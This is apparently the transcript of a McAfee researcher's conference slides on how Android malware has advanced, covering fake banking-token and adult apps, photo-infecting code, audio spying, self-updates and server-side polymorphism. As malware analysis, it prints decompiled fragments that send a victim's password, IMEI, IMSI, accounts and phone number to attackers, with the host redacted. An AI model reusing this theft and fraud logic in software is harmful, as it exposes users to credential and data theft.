isn't it all just sms-sending trojans?: real advances in android malware
DESCRIPTION
Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.TRANSCRIPT
McAfee Confidential—Internal Use Only
Isn't it all just SMS-sending trojans?: Real advances in Android Malware
Jimmy Shah
Mobile Security Researcher
Let's look at the numbers
Not just malware ...
0.0%
10.0%
20.0%
30.0%
40.0%
50.0%
60.0%
70.0%
80.0%
90.0%
100.0%
49.3%
50.7%
Malware vs PUP
Almost everything but SMS-sending trojans
Send Handset Info
Spyware
Adware
Sends Premium SMS
Fraud
Exploit
Rooting malware
Backdoor/Botnet
HackTool
Downloader/Installer
0.0%5.0% 10.0% 15.0% 20.0%
25.0% 30.0% 35.0%40.0% 45.0%
42.0%
21.7%
8.7%
18.8%
2.9%23.2%
2.9%27.5%
4.3%
10.1%
By Category
Attacker Tricks
Attacker Tricks - Encryption
• Simple– Obfuscations
• Hiding SMS numbers/message text within plaintext HTML files
– Substitution cipher
• Config file containing encrypted SMS numbers/message text
<link rel="stylesheet" type="text/css" href="/en/shar
ed/core/2/css/css.ashx?sc=/en/us/site.config&pt=cspMscomHomePage&c=cspMscomSiteBrand;cspSearchComponent
;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVe
rticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js">
</script><meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Get
product information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c
<SMS#>::<MSG>::241.55руб.<SMS#>::<MSG>::173.88руб.<SMS#>::<MSG>::86.00руб.
Attacker Tricks - Encryption
• Complex
– Symmetric cipher• DES
• Encrypt URL queries and C&C commands
• Encrypt/decrypt config file
– URLs, next connect time
– Encrypt/decrypt C&C commands
– Decrypt root exploits
byte abyte1[] = k.b; DESKeySpec deskeyspec = new DESKeySpec(abyte1); javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec); Cipher cipher = Cipher.getInstance("DES"); b = cipher; cipher.init(2, secretkey);
Attacker Tricks – Fraud
• Pretending to be a legitimate app– Not the same as injecting malicious code
– New or reused code that simulates the real app
• Includes malicious functions
• Almost just malicious code
./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class
./com/example/android/service/R$id.class
./com/example/android/service/R$raw.class
./com/example/android/service/Main$KitchenTimerReceiver.class
./com/example/android/service/KitchenTimerService$2.class
./com/example/android/service/R$attr.class
./com/example/android/service/R$layout.class
./com/example/android/service/R.class
./com/example/android/service/Main.class
./com/example/android/service/R$drawable.class
./com/example/android/service/KitchenTimerService$1.class
./com/example/android/service/KitchenTimerService.class
./com/example/android/service/Main$1.class
./com/example/android/service/R$string.class
./token/bot/StartSettings.class
./token/bot/WebApi.class
./token/bot/CatchResult.class
./token/bot/SendSmsResult.class
./token/bot/SettingsSet.class
./token/bot/ScreenItem.class
./token/bot/AutorunReceiver.class
./token/bot/ServerResponse.class
./token/bot/MainActivity.class
./token/bot/ThreadOperation.class
./token/bot/AlarmReceiver.class
./token/bot/ThreadOperationListener.class
./token/bot/SmsReciver.class
./token/bot/MainApplication.class
./token/bot/MainService.class
./token/bot/SmsItem.class
./token/bot/HttpParam.class
./token/bot/Settings.class
./token/bot/UpdateActivity.class
./token/bot/MainActivity$1.class
Android/OneClickFraud
Android/FakeToken
Attacker Tricks – Fraud
• Android/FakeToken– Fake security token app
• Customized for different banks
– App asks for the user's password and displays fake soft token
public void sendPass(String paramString) { try { if (!Settings.saved.sendInitSms) { Settings.saved.sendInitSms = true; String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString; MainService.sendSms(Settings.saved.number, str); MainApplication.settings.save(this.context); } new Thread(new ThreadOperation(this, 1, paramString)).start(); label109: return; } catch (Exception localException) { break label109; } }
Attacker Tricks – Fraud
• Android/OneClickFraud– Fake adult entertainment app
• App asks for the user to pay for a subscription to the adult site
– Repeats every 5 minutes
public void onReceive(Context paramContext, Intent paramIntent) { kitchenTimerService.schedule(300000L); setContentView(2130903040); Account[] arrayOfAccount;
Attacker Tricks – Fraud
• Android/OneClickFraud– Sends user information including Google account to the attacker
if (ctf.intValue() == 0) { Main localMain = Main.this; Integer localInteger = Integer.valueOf(1); localMain.ctf = localInteger; TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone"); arrayOfAccount = AccountManager.get(Main.this).getAccounts(); str1 = ""; int i = arrayOfAccount.length; j = 0; if (j >= i) { String str2 = doPost("http://<removed>", ""); StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>"); String str3 = localTelephonyManager.getDeviceId(); StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno="); String str4 = localTelephonyManager.getLine1Number(); Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2); Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1); startActivity(localIntent1); boolean bool = moveTaskToBack(1); } }
4/19/1212
Attacker Tricks - Injecting code
• Android/Moghava.A– Malicious code injected into a legitimate app
• Recipes for Iranian meals
4/19/1213
Attacker Tricks - Injecting code
• Android/Moghava.A– Real virus
• Overwriting file infector– Not executable files, just image files
» Specifically all of your JPGs» Designed to “photo bomb” all your photos with the Ayotollah
Khomeni• Code injection:
– Buggy
• Doesn't check if it's infected a file before
./com/Moghava/kicker.smali
./com/Moghava/stamper$1.smali
./com/Moghava/stamper$1$1.smali
./com/Moghava/stamper.smali
./ir/sharif/iranianfoods/R$attr.smali
./ir/sharif/iranianfoods/R$styleable.smali
./ir/sharif/iranianfoods/R$menu.smali
./ir/sharif/iranianfoods/ListItemAdapter.smali
./ir/sharif/iranianfoods/IranData.smali
./ir/sharif/iranianfoods/Touch$AddImgAdp.smali
./ir/sharif/iranianfoods/TabHostActivity.smali
./ir/sharif/iranianfoods/Constants.smali
4/19/1214
Attacker Tricks - Injecting code
localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505);
localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath());
int m = localBitmap2.getWidth();
int n = localBitmap1.getWidth();
int i1 = m;
int i2 = n;
if (i1 > i2)
{
i3 = localBitmap2.getWidth();
i4 = localBitmap2.getHeight();
label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888;
localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig);
Canvas localCanvas = new Canvas(localBitmap3);
float f1 = 0.0F;
float f2 = 0.0F;
Paint localPaint1 = null;
localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1);
float f3 = 100.0F;
float f4 = 300.0F;
Paint localPaint2 = null;
localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2);
}
4/19/1215
Attacker Tricks - Injecting code
Credit: Mark Peters (Flickr ID - sneakerdog)
4/19/1216
Attacker Tricks – Recording Audio
• Audio– DTMF(“Touch Tones”)– Telephone Calls
• Initially used in academic PoCs– SoundComber
• DB of IVR Converted DTMF• January 2011
• Very common in spyware• Used in malware
4/19/1217
Attacker Tricks – Recording Audio
• Android/Nickispy– Records to AMR files– August 2011
• Android/GoldenEagle– Records to AMR files– September 2011
• Audio recording benefits– Trade secrets– CC#– PINs
4/19/1218
Attacker Tricks - Malware Updates
• Malware authors are now including update functionality– Keeping the profits rolling in and maintaining control of devices– Initially just used by mobile botnet clients
• Generally only requires the permission INSTALL_PACKAGES• android.permission.INSTALL_PACKAGES
• There are two main ways users are attacked– Fake legitimate updates
• Ex: SYSTEM_PATCH, Android_4.0_patch• Really just trojan horses
– Malware updating itself• More functions
– Send sensitive user info– Exfiltrate data
• New/patched payloads– Exploits
4/19/1219
Attacker Tricks - Malware Updates
• Real malware updates– Because even the bad guys understand that sometimes you need to patch
• Usually not visual– Don't inform the users/victims– Don't depend on users to approve updates
4/19/1220
Academic Research - Taplogger
• Taplogger– Combination training and attack app
• Reads accelerometer for keypresses• Training app is a fake icon matching game
– High score = trained it to steal your pin• Two attacks
– Number pad logging» PINs, CC#s,etc.
– Password stealing» Screen unlock
– Previous research• Touchlogger
– Two parts – training and logging• ACCessory
– Detects full keyboard
4/19/1221
Academic Research - Taplogger
Attacker Tricks - Rooting Exploits
• Rooting Android
– Good for improving security, but can leave you open to attack
– Replacing firmware
– Removing bloatware and security vulnerabilities
• Most attackers are not interested in developing their own exploits– Function of slow patching on Android and number of parties involved in
releasing new firmware• “too many chefs in the kitchen”
– Leads to the same three or four common exploits and minor modifications
Exploit Detected as
PSneuter Exploit/RetuenSP.A
Gingerbreak Exploit/Voldbrk, 18 minor variants of the same exploit
Exploid Exploit/Lvedu, 26 minor variants
RageAgainstTheCage Exploit/Diutes, 5 minor variants
Attacker Tricks – Server-Side Polymorphism
• Server-side– Uses larger resources server side vs. lower powered devices– Modifying DEX files
• Manual changes– Renaming source and recompiling
• Automated changes– Easier than it sounds– Scriptable text changes in source
Attacker Tricks – Server-Side Polymorphism
• One major family: Android/FakeInstaller• Main generic signature• Supplementary detections for 25 variants• Changes
– By day– By hour
Acknowledgements
Acknowledgments
• Zhi Xu, Kun Bai, and Sencun Zhu for the background on their Taplogger research.
